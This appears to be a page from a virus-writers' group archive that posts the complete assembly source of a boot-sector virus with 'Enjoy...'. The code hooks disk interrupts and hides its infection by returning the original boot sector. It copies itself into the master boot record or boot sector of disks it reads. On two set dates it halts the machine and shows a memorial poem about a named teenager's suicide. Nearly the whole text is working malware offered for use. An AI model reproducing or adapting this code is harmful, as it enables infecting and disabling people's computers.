Copy Link
Add to Bookmark
Report
SLAM4.040: In Memorium by CyberYoda/SLAM
Here's the source code to CyberYoda's BS virus. Enjoy...
[VD/SLAM]
.286
.model tiny
.code
org 0
Memorial:
jmp short Entry_Virus
db 3ch dup (0)
Entry_Virus:
xor di, di ; DI = 0
cli ; Clear Interrupts
mov ds, di ; DS = 0
mov ss, di ; SS = 0
add di, 100h
cld ; Clear Direction Flag
mov bx, word ptr ds:[di+313h] ; Get amount of Free Mem
dec bx
dec bx ; Decrease Amount of Free Mem
mov word ptr ds:[di+313h], bx ; Set amount of Free Mem
shl bx, 6 ; Shift left with 6 (Div by 2^6)
mov es, bx ; ES = New Segment
mov sp, 7C00h ; SS:SP = 0:7C00h
sti ; Restor Interrupts
mov si, sp ; SI = 7C00h
push ds
push di
pop cx ; CX = 100h Bytes to copy
pop di ; DI = 0
rep movsw
push bx ; Push Segment
mov ax, offset Mem_Entry ; Load Mem_Entry Offset
push ax ; Push It
retf
Mem_Entry:
xor di, di
push 0F000h
pop es ; ES = F000h
mov ax, 18CDh ; Search for 'Int 18h'
dec cx ; CX should equal FFFFh
Scasw_Loop:
scasw
je Found
dec di
loop Scasw_Loop
Found:
push es
dec di
dec di
push di
mov es, bx
mov si, 13h*4h
lea di, Original_13h
movsw ; Move Offset
movsw ; Move Segment
pop word ptr DS:[13h*4] ; Pop Offset (DI from previous)
pop word ptr DS:[13h*4+2] ; Pop F000h
mov word ptr DS:[18h*4], offset Int_13h_Handler ; Set New Offset
mov word ptr DS:[18h*4+2], ES ; Set new Segment
push cs
pop es ; ES = CS
mov bx, Offset Second_Sector ; Read to ES:512
mov cx, 8h ; Where Second Sector is.
xor dh, dh ; Zero Head
call Read_Sector
mov ah, 4 ; Get Date
int 1ah
cmp dx, 0910h ; Is it his Birth Day?
je Payload
cmp dx, 0222h ; Is it his Departure Date?
je Payload
Reboot:
int 19h ; Reboot
Payload:
push cs
pop ds
push cs
pop es
mov si, 512
mov di, 512
mov cx, 256
mov bx, 1010101010101010b
Xor_Loop:
lodsw
xor ax, bx
stosw
loop Xor_Loop
mov ax, 600h ; Clear Screen
;xor cx, cx
mov dx, 1950h ; 80x25
xor bx, bx
Int 10h
mov ah, 13h ; Print Text
mov bl, 1001b ; Light Blue
xor di, di
Print_Loop:
mov bp, word ptr CS:[Data + di] ; Location
mov cl, byte ptr CS:[Data + 2 + di] ; Length
mov dx, word ptr CS:[Data + 3 + di] ; Row and Column
Int 10h
add di, 5
cmp di, 50 ; Nine Strings to Print
jb Print_Loop
mov ax, 01010h ; Set Background Color
xor bx, bx
mov cx, 0FFFFh ; White
mov dh, 0FFh
Int 10h
jmp $ ; Stall Computer
Read_Sector:
mov di, 3
Read:
xor ax, ax ; AX = 0
call Int_13h ; Reset Disk System
mov ax, 201h ; Read into Memory
call Int_13h ; Original Int 13h
jnb Exit_Read ; Keep reading until No Error
dec di
jnz Read
Exit_Read:
ret
Int_13h_Handler:
cli ; Clear Interrupts
add sp, 6h ; Take off for the Int 18h
sti ; Restore Interrupts
cmp cx, 1h ; Sector = 0?
jne Exit
cmp dh, 0h ; Head = 0?
jne Exit
cmp ah, 2h ; Read?
jne Exit
Call Int_13h ; Allow Read
jnc Call_Read ; If no Problem Call Read
Exit:
db 0eah
Original_13h dd ?
Call_Read:
pushf
pusha
push ds es
cmp word ptr es:[bx+offset Marker], 'BT'
jne Infect
Stealth:
mov cx, 9h
call Read_Sector ; Read Original Boot Sector
Exit_Stealth:
pop es ds
popa
popf
retf 2
Infect:
push cs cs
pop ds es ; DS=ES=CS
mov bx, 1024 ; After Our Virus
Call Read_Sector
mov cx, 3Ch ; Copy 3Ch bytes of Boot Stuff
mov si, 1026 ; From CS:1026
mov di, 2 ; To CS:2
cld ; Clear Direction Flag
rep movsb ; Move From DS:SI to ES:DI
mov cx, 40h
mov si, 5BEh
mov di, 1BEh
cld
rep movsb
mov bx, 512
xor dh, dh ; Head 0
mov cx, 8h ; Track 0, Sector 8
mov di, 3
Save_MBR_BS:
xor ax, ax
Int 13h
mov ax, 302h ; Write 1 Sector, MBR/BS
Call Int_13h
jnb MBR_BS_Saved ; No Problem Continue
cmp al, 3h ; Is the Problem Write Protection?
je Exit_Stealth ; Exit if it is
dec di ; Otherwise Retry 3 times
jnz Save_MBR_BS
jmp short Exit_Stealth ; Disk is bad, Abort.
MBR_BS_Saved:
xor bx, bx ; From CS:0
mov cx, 1h ; Track 0, Sector 1
mov di, 3h
Write_Virus:
xor ax, ax ; Reset Disk
Int 13h
mov ax, 301h ; Write 1 sectors, Virus
call Int_13h
jnb Virus_Written ; Not Problem Continue
cmp al, 3h ; Not likely, but just in case
je Exit_Stealth ; Its not too late to abort
dec di ; Otherwise Retry 3 times
jnz Write_Virus
Virus_Written:
jmp short Exit_Stealth
Int_13h:
pushf ; Push Flags
call dword ptr cs:[Original_13h]; Call Orginal Int 13h
ret ; Return
Marker db 'TB'
ORG 1BEh
ORG 1FEh
db 055h, 0AAh
Second_Sector:
Trent db '-= Trenton A. Breazeale =-'
Poem1 db '-= So on I worked and waited for my light. =-'
Poem2 db '-= Not knowing, I settled into my bed; =-'
Poem3 db '-= That Trenton Breazeale, one calm winter night, =-'
Poem4 db '-= Went home and put a bullet through his head. =-'
Info db '-= September 10, 1980 - February 22, 1998 =-'
RIP db '-= R.I.P. Good Buddy. You will never be forgotten. =-'
Please db 'Please Help Somebody Today.'
Please2 db 'Tomorrow may be too late.'
Late db 'Tomorrow was too late to help Trent...'
End_Msg:
Data:
Trentbp dw offset Trent
Trentcl db (Offset Poem1 - Offset Trent)
Trentdl db (80 - (Offset Poem1 - Offset Trent))/2
Trentdh db 3
Poem1bp dw Offset Poem1
Poem1cl db (Offset Poem2 - Offset Poem1)
Poem1dl db (80 - (Offset Info-Offset Poem1)/4)/2
Poem1dh db 6
Poem2bp dw offset Poem2
Poem2cl db (Offset Poem3 - Offset Poem2)
Poem2dl db (80 - (Offset Info-Offset Poem1)/4)/2
Poem2dh db 7
Poem3bp dw offset Poem3
Poem3cl db (Offset Poem4 - Offset Poem3)
Poem3dl db (80 - (Offset Info-Offset Poem1)/4)/2
Poem3dh db 8
Poem4bp dw offset Poem4
Poem4cl db (Offset Info - Offset Poem4)
Poem4dl db (80 - (Offset Info-Offset Poem1)/4)/2
Poem4dh db 9
Infobp dw offset Info
Infocl db (Offset Rip - Offset Info)
Infodl db (80 - (Offset Rip - Offset Info))/2
Infodh db 13
Ripbp dw offset Rip
Ripcl db (Offset Please - Offset Rip)
Ripdl db (80 - (Offset Please - Offset Rip))/2
Ripdh db 15
Pleasebp dw offset Please
Pleasecl db (Offset Please2 - Offset Please)
Pleasedl db (80 - (Offset Please2 - Offset Please))/2
Pleasedh db 18
Please2bp dw offset Please2
Please2cl db (Offset Late - Offset Please2)
Please2dl db (80 - (Offset Late - Offset Please2))/2
Please2dh db 19
Latebp dw offset Late
Latecl db (Offset End_Msg - Offset Late)
Latedl db (80 - (Offset End_Msg - Offset Late))/2
Latedh db 22
Author db '(C) ',27h, '98 CyberDarkness & CyberYoda [SLAM]'
End Memorial
